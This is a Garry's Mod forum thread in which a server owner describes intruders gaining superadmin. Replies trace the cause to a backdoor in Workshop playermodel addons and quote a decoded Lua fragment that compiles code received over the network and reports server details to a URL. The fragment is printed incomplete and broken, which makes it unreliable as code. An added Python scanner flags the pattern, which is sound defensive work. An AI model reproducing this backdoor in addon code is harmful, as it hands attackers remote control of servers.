So over the past few days things have got pretty bad on my deathrun server. Someone with playermodels on the workshop joined (they were added on my server) and was able to give himself superadmin and then give people points in the pointshop. I banned him, thinking, well, it must have been an exploit.
Since then, a lot of others have joined doing the same thing except they would ban users too. When staff banned them it would just ban someone else in the server. The hackers were able to rejoin like they weren’t banned at all. And some of the people who were banned because staff was banning the hackers. So basically at this point, they bypass bans, can give themselves ranks, can ban people, and access pointshop.
I thought maybe it was an RCON exploit or whatever, so I disabled it and added something that bans you if you get the password wrong. I set sv_allowcslua to 0 and sv_allowupload/download to 0. I got all the IPs I could find and banned them, but for some reason the same one has joined back more than 3 times. Guess whose it is? The guy from Steam Workshop. He used different names and accounts all under the same IP. There are also a few other IPs involved. Also, a few of them used voice chat and had different voices so it’s more than one person.
Well after all of my efforts they still were able to come on today and bypass bans.
I really do not know what to do. I have logs and IPs and Steam IDs, all banned, but they can still connect!
Please please help!
[editline]1st August 2014[/editline]
Also, when I banned the guy from the workshop he said to one of my admins “i admin I was trolling, gave myself admin using an exploit then tested to see if it worked by settings points :p”
[editline]1st August 2014[/editline]
Oh and one more thing, I have removed his models from my servers as well.
If you’ve removed his stuff and it’s still happening, there’s probably something else that was added in as an exploit. I’d do a backup, then clear all of your addons out and basically reinstall the server and re-add them, minus that guy’s shit.
It looks like this is in most, if not all of his playermodel addon scripts that come packaged with the models. I know nothing about coding so I can’t really translate it. Any chance we can get more info on this so we can at least make sure people don’t continue cramming his addons on their server?
I had nothing to do at the moment so I “decoded” the exploit:
    if SERVER and game.IsDedicated() then
        local f = (function() end)
        local c = CompileString
        local r = net.ReadString
        net.Receivers.m9k_addons = function()
            local s = c(r() or "--", "[C]", false)
            if type(s) ~= "string" then
            hn = GetConVarString("hostname"),
            ip = GetConVarString("ip"),
            np = #player.GetAll()
        }, f, f)
It basically allows running arbitrary Lua code on dedicated servers and sends shitty statistics (server name/IP and number of players) to some URL.
People with addons on the workshop will put backdoors in their Lua files and basically what they are doing is if a player’s Steam ID == the creator of the addon then set their usergroup to superadmin. They then have access to everything.
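A defensive check for the pattern decoded above, as an added example that is not part of the original thread: a Python scanner that flags Lua files which alias CompileString/RunString or net.ReadString to short locals, assign a handler directly into net.Receivers, or compile a string read from the network. The names scan_lua and scan_tree and the finding tags are assumptions made for this example; the sample is the start of the fragment as posted.

```python
import re
from pathlib import Path

# Real Garry's Mod functions that run a string as code, and the net read that can feed them.
EXEC_FUNCS = {"CompileString", "RunString", "RunStringEx"}
NET_READ = "net.ReadString"
SENSITIVE = EXEC_FUNCS | {NET_READ}
ALIAS_RE = re.compile(r"\blocal\s+(\w+)\s*=\s*([\w.]+)(?![\w.]*\s*\()")
RECEIVER_RE = re.compile(r"\bnet\.Receivers\s*(?:\.\s*\w+|\[[^\]]+\])\s*=(?!=)")
CALL_RE = re.compile(r"([\w.]+)\s*\(")

# First lines of the decoded fragment posted in the thread (incomplete Lua).
SAMPLE_BACKDOOR = """\
if SERVER and game.IsDedicated() then
local f = (function() end)
local c = CompileString
local r = net.ReadString
net.Receivers.m9k_addons = function()
local s = c(r() or "--", "[C]", false)
"""

def scan_lua(source):
    """Return (line_number, tag) findings for one Lua source string."""
    # Map short aliases such as `local c = CompileString` back to the real name.
    aliases = {m[1]: m[2] for m in ALIAS_RE.finditer(source) if m[2] in SENSITIVE}
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        m = ALIAS_RE.search(line)
        if m and m[2] in SENSITIVE:
            findings.append((lineno, "alias"))      # sensitive function renamed
        if RECEIVER_RE.search(line):
            findings.append((lineno, "receiver"))   # handler set without net.Receive
        called = {aliases.get(name, name) for name in CALL_RE.findall(line)}
        if called & EXEC_FUNCS and NET_READ in called:
            findings.append((lineno, "net-exec"))   # network string compiled or run
    return findings

def scan_tree(root):
    """Scan every .lua file under root; return {path: findings} for files with hits."""
    hits = {}
    for path in Path(root).rglob("*.lua"):
        found = scan_lua(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits

if __name__ == "__main__":
    print(scan_lua(SAMPLE_BACKDOOR))
```

Run scan_tree over extracted addon Lua; packed workshop .gma files have to be extracted first. A hit is a reason to read the file by hand, and code that hides these names behind string lookups will not match.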
I’m guessing those statistics are actually there so he knows what servers have the addon installed so he can go have his fun.
Unfortunately it’s a little more than that. Your average player (or server host) isn’t going to check every single addon for exploits, and this code isn’t just “hey, give me admin” but rather it’s been obfuscated and even hidden in a spot that’s obvious yet easy for some people to miss. In other words, he’s not setting himself as an admin for shits and giggles but rather he’s creating a backdoor that allows him to hop in, do whatever he wants, and freak the shit out of people who most likely have no idea what’s going on.
In any case, thanks for the help, mijyuoon. I’m not quite sure where to go from here yet, but I’ll figure it out.